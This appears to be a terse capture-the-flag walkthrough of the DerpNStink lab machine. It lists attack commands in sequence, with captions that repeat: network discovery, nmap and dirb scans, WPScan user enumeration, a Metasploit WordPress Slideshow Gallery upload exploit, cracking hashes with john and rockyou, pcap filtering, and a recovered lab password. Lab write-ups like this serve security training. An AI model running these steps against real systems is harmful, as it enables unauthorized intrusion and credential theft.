scaning the network

netdiscover -r 10.0.9.0/24

Checking if a web server is running on  the target {Passive recon}

YES !!!!

NMAP SCAN WITH ONE OF THE PROFILES

NMAP -A -T3 10.0.9.129

FLAG 1 IN PAGE SOURCE

Some more looking around....

Some more looking around....

Some more looking around....

SOME DIRECTORY BUSTING BCOZ WHY NOT ..

dirb http://10.0.9.129

SOME DIRECTORY BUSTING BCOZ WHY NOT ..

dirb http://10.0.9.129

Interesting WordPress running on our server

FTPing the  server  as we know vftpd is running

ftp://10.0.9.129

FTPing the  server  as we know vftpd is running

ftp 10.0.9.129

SSH

ssh root@10.0.9.129

Key !! we need a key

WPScan the weblog directory

wpscan --url http://derpnstink.local/weblog/ --enumerate p --enumerate t --enumerate u --enumerate tt

And More

WPScan the weblog directory

wpscan --url http://derpnstink.local/weblog/ --enumerate p --enumerate t --enumerate u --enumerate tt

WPScan the weblog directory

wpscan --url http://derpnstink.local/weblog/ --enumerate p --enumerate t --enumerate u --enumerate tt

Users and Password of one

Metasploit have it

search Slideshow Gallery

Metasploit have it

exploit/unix/webapp/wp_slideshowgallery_upload

Metasploit have it

All options set

Metasploit have it

All options set

Metasploit have it

All options set

MySQL database

 

MySQL database

 

Bruteforceing

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Bruteforceing

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Accessing Wordpress panel

http://derpnstink.local/weblog/wp-login.php

Accessing Wordpress panel

http://derpnstink.local/weblog/wp-login.php

Now Escalate

Now Escalate

Now Escalate

Now Escalate

Now Escalate

Now ENUM

Now ENUM

Now ENUM

wedgie57

Now ENUM

Now ENUM

and chmod 400 stinky.key

Now ENUM

Now ENUM on the PCAP 

http.request.method == POST

MR derp GOT PWNED

LETS GET ROOT !

YOU GOT PWNED

Thank you Thank you!!!

derp and stink

By Sheeraz ali

derp and stink

  • 668